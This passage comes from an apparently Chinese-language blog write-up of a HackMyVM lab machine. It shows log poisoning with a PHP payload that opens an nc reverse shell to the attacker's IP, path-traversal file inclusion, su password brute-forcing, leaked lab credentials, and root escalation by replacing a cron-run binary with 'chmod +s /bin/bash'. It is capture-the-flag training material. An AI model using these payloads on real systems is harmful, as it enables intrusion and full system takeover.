src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502137.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403135548543\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u7b2c\u4e09\u4e2a\u53ef\u4ee5\u8bfb\u53d6\u4e86\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502138.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502138.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403135615024\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u6784\u9020payload\uff1a<\/p>\n<pre><code class=\"language-bash\">curl http:\/\/thetruthoftalos.hmv\/exploit -H &quot;User-Agent: &lt;?php exec(&#039;nc -e \/bin\/bash 172.20.10.8 1234&#039;)  ?&gt;&quot;<\/code><\/pre>\n<pre><code class=\"language-html\">&lt;html&gt;\n&lt;head&gt;&lt;title&gt;404 Not Found&lt;\/title&gt;&lt;\/head&gt;\n&lt;body&gt;\n&lt;center&gt;&lt;h1&gt;404 Not Found&lt;\/h1&gt;&lt;\/center&gt;\n&lt;hr&gt;&lt;center&gt;nginx\/1.22.1&lt;\/center&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;<\/code><\/pre>\n<p>\u7136\u540e\uff1a<\/p>\n<pre><code class=\"language-bash\">curl http:\/\/thetruthoftalos.hmv\/index.php?filename=....\/\/....\/\/....\/\/....\/\/\/var\/log\/nginx\/access.log<\/code><\/pre>\n<pre><code class=\"language-html\">&lt;html&gt;\n&lt;head&gt;&lt;title&gt;504 Gateway Time-out&lt;\/title&gt;&lt;\/head&gt;\n&lt;body&gt;\n&lt;center&gt;&lt;h1&gt;504 Gateway Time-out&lt;\/h1&gt;&lt;\/center&gt;\n&lt;hr&gt;&lt;center&gt;nginx\/1.22.1&lt;\/center&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;<\/code><\/pre>\n<p>shell\u5f39\u56de\u6765\u4e86\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502139.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502139.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403140237653\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u5207\u6362\u7528\u6237<\/h3>\n<p>\u8bb0\u5f97\u6211\u4eec\u4e4b\u524d\u770b\u5230\u7684<code>\/etc\/passwd<\/code>\u4e86\u5417\uff0c\u6211\u4eec\u786e\u5b9e\u6709\u4e86\u4e00\u4e2a\u7528\u6237\uff1a<\/p>\n<pre><code class=\"language-apl\">hermanubis\nByronIsAsshole<\/code><\/pre>\n<p>\u5c1d\u8bd5\u5207\u6362\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) hermanubis@principle2:\/home\/hermanubis$ whoami;id\nhermanubis\nuid=1002(hermanubis) gid=1002(hermanubis) groups=1002(hermanubis)\n(remote) hermanubis@principle2:\/home\/hermanubis$ ls -la\ntotal 32\ndrwx------ 3 hermanubis hermanubis 4096 Nov 29 01:13 .\ndrwxr-xr-x 7 root       root       4096 Nov 25 16:19 ..\nlrwxrwxrwx 1 root       root          9 Nov 25 17:34 .bash_history -&gt; \/dev\/null\n-rwx------ 1 hermanubis hermanubis  220 Apr 23  2023 .bash_logout\n-rwx------ 1 hermanubis hermanubis 3526 Apr 23  2023 .bashrc\n-rwx------ 1 hermanubis hermanubis  264 Nov 23 21:18 investigation.txt\n-rwx------ 1 hermanubis hermanubis  807 Apr 23  2023 .profile\ndrwxr-x--- 2 hermanubis hermanubis 4096 Nov 28 14:44 share\n-rwx------ 1 hermanubis hermanubis 1080 Nov 25 17:29 user.txt\n(remote) hermanubis@principle2:\/home\/hermanubis$ cat user.txt\n                                ...&#039;,;;:cccccccc:;,..\n                            ..,;:cccc::::ccccclloooolc;&#039;.\n                         .&#039;,;:::;;;;:loodxk0kkxxkxxdocccc;;&#039;..\n                       .,;;;,,;:coxldKNWWWMMMMWNNWWNNKkdolcccc:,.\n                    .&#039;,;;,&#039;,;lxo:...dXWMMMMMMMMNkloOXNNNX0koc:coo;.\n                 ..,;:;,,,:ldl&#039;   .kWMMMWXXNWMMMMXd..&#039;:d0XWWN0d:;lkd,\n               ..,;;,,&#039;&#039;:loc.     lKMMMNl. .c0KNWNK:  ..&#039;;lx00X0l,cxo,.\n             ..&#039;&#039;....&#039;cooc.       c0NMMX;   .l0XWN0;       ,ddx00occl:.\n           ..&#039;..  .&#039;:odc.         .x0KKKkolcld000xc.       .cxxxkkdl:,..\n         ..&#039;&#039;..   ;dxolc;&#039;         .lxx000kkxx00kc.      .;looolllol:&#039;..\n        ..&#039;..    .&#039;:lloolc:,..       &#039;lxkkkkk0kd,   ..&#039;:clc:::;,,;:;,&#039;..\n        ......   ....&#039;,;;;:ccc::;;,&#039;&#039;&#039;,:loddol:,,;:clllolc:;;,&#039;........\n            .     ....&#039;&#039;&#039;&#039;,,,;;:cccccclllloooollllccc:c:::;,&#039;..\n                    .......&#039;&#039;,,,,,,,,;;::::ccccc::::;;;,,&#039;&#039;...\n                      ...............&#039;&#039;&#039;,,,;;;,,&#039;&#039;&#039;&#039;&#039;&#039;......\n                           ............................\n\nCONGRATULATIONS!\n\nThe flag is:\n&amp;5Wvtd!84S6JSMeH\n(remote) hermanubis@principle2:\/home\/hermanubis$ cat investigation.txt    \nI am aware that Byron hates me... especially since I lost my password.\nMy friends along with myself after several analyses and attacks, we have detected that Melville is using a 32 character password....\nWhat he doesn&#039;t know is that it is in the Byron database...<\/code><\/pre>\n<h3>\u7206\u7834\u7528\u6237Melville<\/h3>\n<p>\u53c8\u51fa\u73b0\u4e86\u6211\u4eec\u4e4b\u524d\u53d1\u73b0\u7684\u90a3\u4e2a\u5bc6\u7801\u672c\u7684\u5185\u5bb9\uff0c\u4f7f\u7528\u5de5\u5177\u8fdb\u884csu\u7206\u7834\uff1a<\/p>\n<blockquote>\n<p><a href=\"https:\/\/github.com\/carlospolop\/su-bruteforce\">https:\/\/github.com\/carlospolop\/su-bruteforce<\/a><\/p>\n<\/blockquote>\n<p>\u5c06\u5de5\u5177<code>suBF.sh<\/code>\u548c<code>hex.txt<\/code>\u4e0a\u4f20<\/p>\n<pre><code class=\"language-bash\">.\/suBF.sh -u melville -w hex.txt<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502140.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502140.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403142023070\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u63d0\u6743\u81f3root<\/h3>\n<h4>\u4fe1\u606f\u641c\u96c6<\/h4>\n<pre><code class=\"language-bash\">melville@principle2:\/tmp$ sudo -l\nMatching Defaults entries for melville on principle2:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser melville may run the following commands on principle2:\n    (talos) NOPASSWD: \/usr\/bin\/cat<\/code><\/pre>\n<p>\u4f46\u662f\u53d1\u73b0\u8fd9\u4e2a\u7528\u6237\u7684\u6743\u9650\u5b9e\u5728\u4e0d\u9ad8\uff0c\u800c\u4e14\u8fd8\u4e0d\u80fdssh\u767b\u5f55\u3002<\/p>\n<pre><code class=\"language-text\">talos:x:1000:1000:Talos,,,:\/home\/talos:\/bin\/bash<\/code><\/pre>\n<p>suid\u4e5f\u6ca1\u5565\uff1a<\/p>\n<pre><code class=\"language-bash\">melville@principle2:\/tmp$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/bin\/mount\n\/usr\/bin\/su\n\/usr\/bin\/umount\n\/usr\/bin\/chfn\n\/usr\/bin\/updater\n\/usr\/bin\/sudo\n\/usr\/bin\/newgrp\n\/usr\/bin\/passwd\n\/usr\/bin\/gpasswd\n\/usr\/bin\/chsh\n\/usr\/sbin\/mount.nfs\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign<\/code><\/pre>\n<pre><code class=\"language-bash\">melville@principle2:\/$ echo $PATH\n\/usr\/local\/bin:\/usr\/bin:\/bin:\/sbin:\/usr\/sbin:\/usr\/local\/sbin\nmelville@principle2:\/$ find \/ -type f -writable 2&gt;\/dev\/null\n......\n\/usr\/local\/share\/report\nmelville@principle2:~$ ls -la\ntotal 32\ndrwx------ 3 melville melville 4096 Nov 26 11:38 .\ndrwxr-xr-x 7 root     root     4096 Nov 25 16:19 ..\nlrwxrwxrwx 1 root     root        9 Nov 25 15:25 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 melville melville  220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 melville melville 3616 Nov 25 16:09 .bashrc\n-rw------- 1 melville melville   20 Nov 25 16:12 .lesshst\ndrwxr-xr-x 3 melville melville 4096 Nov 23 20:55 .local\n-rw-r--r-- 1 melville melville   39 Nov 25 17:11 note.txt\n-rw-r--r-- 1 melville melville  807 Apr 23  2023 .profile\nmelville@principle2:~$ cat note.txt\nDon&#039;t touch SUID, it is very DANGEROUS\nmelville@principle2:~$ cd \/etc;ls -la\n......\nmelville@principle2:\/etc$ cd \/opt;ls -la\ntotal 16\ndrwxr-xr-x  3 root root  4096 Nov 25 15:48 .\ndrwxr-xr-x 18 root root  4096 Nov 28 17:34 ..\ndrwx--x--x  4 root root  4096 Nov 20 00:20 containerd\n-rw-r-----  1 root talos    1 Nov 29 01:19 users.txt\nmelville@principle2:\/opt$ cat users.txt \n\nmelville@principle2:\/opt$ cd containerd\/\nmelville@principle2:\/opt\/containerd$ ls\nls: cannot open directory &#039;.&#039;: Permission denied\nmelville@principle2:\/opt\/containerd$ ll\nbash: ll: command not found\nmelville@principle2:\/opt\/containerd$ cd ..\/\nmelville@principle2:\/opt$ ls -la\ntotal 16\ndrwxr-xr-x  3 root root  4096 Nov 25 15:48 .\ndrwxr-xr-x 18 root root  4096 Nov 28 17:34 ..\ndrwx--x--x  4 root root  4096 Nov 20 00:20 containerd\n-rw-r-----  1 root talos    1 Nov 29 01:19 users.txt\nmelville@principle2:\/opt$ cd ..;ls\nbin   dev  home        initrd.img.old  lib32  libx32      media  opt   root  sbin  sys  usr  vmlinuz\nboot  etc  initrd.img  lib             lib64  lost+found  mnt    proc  run   srv   tmp  var  vmlinuz.old\nmelville@principle2:\/$ cd usr\/\nmelville@principle2:\/usr$ ls\nbin  games  include  lib  lib32  lib64  libexec  libx32  local  sbin  share  src\nmelville@principle2:\/usr$ cd games\nmelville@principle2:\/usr\/games$ ls\nmelville@principle2:\/usr\/games$ ls -la\ntotal 8\ndrwxr-xr-x  2 root root 4096 Sep 29  2023 .\ndrwxr-xr-x 14 root root 4096 Nov 18 18:19 ..\nmelville@principle2:\/usr\/games$ cd ..\/share\nmelville@principle2:\/usr\/share$ ls\napparmor-features  common-licenses      doc             icons                libgcrypt20  nfs-common         php8.2-opcache   samba           vim\napplications       consolefonts         doc-base        info                 lintian      nfs-kernel-server  php8.2-readline  sensible-utils  X11\napport             console-setup        dpkg            initramfs-tools      locale       nginx              pixmaps          ssl-cert        xml\napt-listchanges    consoletrans         emacsen-common  installation-report  man          openssh            pkgconfig        systemd         zoneinfo\nbase-files         dbus-1               file            iptables             man-db       os-prober          polkit-1         tabset          zsh\nbase-passwd        debconf              gcc             iso-codes            maven-repo   pam                publicsuffix     tasksel\nbash-completion    debianutils          gdb             ispell               menu         pam-configs        python3          terminfo\nbinfmts            dict                 gnupg           java                 metainfo     perl               python-apt       tools\nbug                dictionaries-common  groff           keyrings             mime         perl5              readline         ucf\nca-certificates    discover             grub            keyutils             misc         php                reportbug        ufw\ncmake              distro-info          i18n            libc-bin             nano         php8.2-common      runit            util-linux\nmelville@principle2:\/usr\/share$ cd ..\/local\nmelville@principle2:\/usr\/local$ ls\nbin  etc  games  include  lib  man  sbin  share  src\nmelville@principle2:\/usr\/local$ ls -la\ntotal 40\ndrwxr-xr-x 10 root root 4096 Nov 18 18:19 .\ndrwxr-xr-x 14 root root 4096 Nov 18 18:19 ..\ndrwxr-xr-x  2 root root 4096 Nov 18 18:19 bin\ndrwxr-xr-x  2 root root 4096 Nov 18 18:19 etc\ndrwxr-xr-x  2 root root 4096 Nov 18 18:19 games\ndrwxr-xr-x  2 root root 4096 Nov 18 18:19 include\ndrwxr-xr-x  3 root root 4096 Nov 18 18:21 lib\nlrwxrwxrwx  1 root root    9 Nov 18 18:19 man -&gt; share\/man\ndrwxr-xr-x  2 root root 4096 Nov 18 18:19 sbin\ndrwxr-xr-x  4 root root 4096 Nov 25 16:58 share\ndrwxr-xr-x  2 root root 4096 Nov 18 18:19 src\nmelville@principle2:\/usr\/local$ cd etc\nmelville@principle2:\/usr\/local\/etc$ ls\nmelville@principle2:\/usr\/local\/etc$ ls -la\ntotal 8\ndrwxr-xr-x  2 root root 4096 Nov 18 18:19 .\ndrwxr-xr-x 10 root root 4096 Nov 18 18:19 ..\nmelville@principle2:\/usr\/local\/etc$ cd ..\/src;ls la\nls: cannot access &#039;la&#039;: No such file or directory\nmelville@principle2:\/usr\/local\/src$ cd ..\/src;ls -la\ntotal 8\ndrwxr-xr-x  2 root root 4096 Nov 18 18:19 .\ndrwxr-xr-x 10 root root 4096 Nov 18 18:19 ..\nmelville@principle2:\/usr\/local\/src$ cd ..\/share;ls -la\ntotal 36\ndrwxr-xr-x  4 root root   4096 Nov 25 16:58 .\ndrwxr-xr-x 10 root root   4096 Nov 18 18:19 ..\ndrwxr-xr-x  2 root root   4096 Nov 18 18:21 ca-certificates\ndrwxr-xr-x  2 root root   4096 Nov 18 18:19 man\n-rwxrwx---  1 root talos 16584 Nov 25 17:09 report\nmelville@principle2:\/usr\/local\/share$ file report \nreport: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=8b1c732db722b63be78e725a15d2968886f5a1d7, for GNU\/Linux 3.2.0, not stripped\n<\/code><\/pre>\n<p>\u627e\u5230\u4e86\u4e00\u4e2a\u6709\u610f\u601d\u7684\u4e1c\u897f\uff0c\u4e0d\u8fc7\u4e0d\u77e5\u9053\u6709\u6ca1\u6709\u7528\uff0c\u4f20\u8fc7\u6765\u5206\u6790\u4e00\u4e0b\uff0c\u987a\u4fbf\u4e22\u4e2a<code>linpeas.sh<\/code>\u641c\u96c6\u4e00\u4e0b\u4fe1\u606f\uff1a<\/p>\n<pre><code class=\"language-c\">int __cdecl main(int argc, const char **argv, const char **envp)\n{\n  char haystack; \/\/ [rsp+0h] [rbp-4A0h]\n  char ptr[1024]; \/\/ [rsp+80h] [rbp-420h]\n  FILE *v6; \/\/ [rsp+480h] [rbp-20h]\n  size_t v7; \/\/ [rsp+488h] [rbp-18h]\n  FILE *stream; \/\/ [rsp+490h] [rbp-10h]\n  int v9; \/\/ [rsp+49Ch] [rbp-4h]\n\n  stream = fopen(&quot;\/opt\/users.txt&quot;, &quot;a+&quot;);\n  if ( !stream )\n  {\n    perror(&quot;Error opening output file&quot;);\n    exit(1);\n  }\n  rewind(stream);\n  v7 = fread(ptr, 1uLL, 0x3FFuLL, stream);\n  ptr[v7] = 0;\n  v6 = popen(&quot;who&quot;, &quot;r&quot;);\n  if ( !v6 )\n  {\n    perror(&quot;Error executing &#039;who&#039; command&quot;);\n    fclose(stream);\n    exit(1);\n  }\n  v9 = 0;\n  while ( fgets(&amp;haystack, 128, v6) )\n  {\n    if ( strstr(&amp;haystack, &quot;www-data&quot;) )\n      notifyNotAllowed(&amp;haystack, &quot;www-data&quot;);\n    if ( !strstr(ptr, &amp;haystack) )\n    {\n      fputs(&amp;haystack, stream);\n      v9 = 1;\n    }\n  }\n  fclose(stream);\n  pclose(v6);\n  if ( v9 )\n    puts(&quot;New information appended to &#039;\/opt\/users&#039;&quot;);\n  else\n    puts(&quot;No new information to append&quot;);\n  return 0;<\/code><\/pre>\n<p>\u4f7f\u7528<code>shift+F12<\/code>\u67e5\u770b\u5b57\u7b26\u4e32\uff0c\u6ca1\u6709\u53d1\u73b0\u53ef\u4ee5\u5229\u7528\u7684\u53c2\u6570\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502141.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502141.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403144339392\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u770b\u4e00\u4e0b<code>linpea.sh<\/code>\u626b\u63cf\u7ed3\u679c\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502142.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502142.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403144539351\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u770b\u6765\u8fd9\u4e2a\u53ef\u5199\u6587\u4ef6\u662f\u6211\u4eec\u7684\u7a81\u7834\u53e3\uff0c\u4e0a\u4f20\u4e00\u4e2a<code>pspy64<\/code>\u76d1\u89c6\u4e00\u4e0b\u7cfb\u7edf\u8fdb\u7a0b\uff1a\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502143.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502143.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403145512586\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502144.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502144.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403145657641\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u4e24\u5206\u949f\u4e00\u6b21\u7684\u5b9a\u65f6\u4efb\u52a1\u3002\u3002\u3002\u3002<\/p>\n<p>\u800c\u4e14\u8fd8\u53ef\u5199\uff0c\u6211\u4eec\u4e0a\u4f20\u4e00\u4e2a\u66ff\u6362\u6389\u5b83\u5373\u53ef\uff1a<\/p>\n<pre><code class=\"language-bash\">#!\/bin\/bash\nchmod +s \/bin\/bash<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502146.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502146.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403145806934\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">chmod +x report\ncp report \/usr\/local\/share\/report<\/code><\/pre>\n<p>\u7b49\u5f85\u4e00\u4f1a\u5373\u53ef\u83b7\u53d6root\uff01<\/p>\n<pre><code class=\"language-bash\">(local) pwncat$ upload report\n.\/report \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501 100.0% \u2022 31\/31 bytes \u2022 ? \u2022 0:00:00[02:58:29] uploaded 31.00B in 0.28 seconds                                                                                                      upload.py:76\n(local) pwncat$                                                                                                                                             \n\n(remote) melville@principle2:\/tmp$ head report \n#!\/bin\/bash\nchmod +s \/bin\/bash\n(remote) melville@principle2:\/tmp$ id\nuid=1003(melville) gid=1003(melville) groups=1003(melville),1000(talos)\n(remote) melville@principle2:\/tmp$ chmod +x report\n(remote) melville@principle2:\/tmp$ cp report \/usr\/local\/share\/report\n(remote) melville@principle2:\/tmp$ ll \/bin\/bash\nbash: ll: command not found\n(remote) melville@principle2:\/tmp$ ls -l \/bin\/bash\n-rwxr-xr-x 1 root root 1265648 Apr 23  2023 \/bin\/bash\n(remote) melville@principle2:\/tmp$ ls -l \/bin\/bash\n-rwsr-sr-x 1 root root 1265648 Apr 23  2023 \/bin\/bash\n(remote) melville@principle2:\/tmp$ \/bin\/bash -p\n(remote) root@principle2:\/tmp# whoami;id\nroot\nuid=1003(melville) gid=1003(melville) euid=0(root) egid=0(root) groups=0(root),1000(talos),1003(melville)\n(remote) root@principle2:\/tmp# cd \/root\n(remote) root@principle2:\/root# ls\nroot.txt\n(remote) root@principle2:\/root# cat root.txt \n\u2800\u2800\u2800\u2800\u2800\u28e0\u28f4\u28f6\u28ff\u28ff\u283f\u28f7\u28f6\u28e4\u28c4\u2840\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2880\u28e0\u28f4\u28f6\u28f7\u283f\u28ff\u28ff\u28f6\u28e6\u28c0\u2800\u2800\u2800\u2800\u2800\n\u2800\u2800\u2800\u2880\u28fe\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28f6\u28e6\u28ec\u2849\u2812\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u281a\u2889\u28e5\u28f4\u28fe\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28e7\u2800\u2800\u2800\u2800\n\u2800\u2800\u2800\u287e\u283f\u281b\u281b\u281b\u281b\u283f\u28bf\u28ff\u28ff\u28ff\u28ff\u28ff\u28f7\u28c4\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2880\u28e0\u28fe\u28ff\u28ff\u28ff\u28ff\u28ff\u283f\u283f\u281b\u281b\u281b\u281b\u283f\u28a7\u2800\u2800\u2800\n\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2819\u283b\u28ff\u28ff\u28ff\u28ff\u28ff\u2844\u2800\u2800\u2800\u2800\u2800\u2800\u28e0\u28ff\u28ff\u28ff\u28ff\u287f\u281f\u2809\u280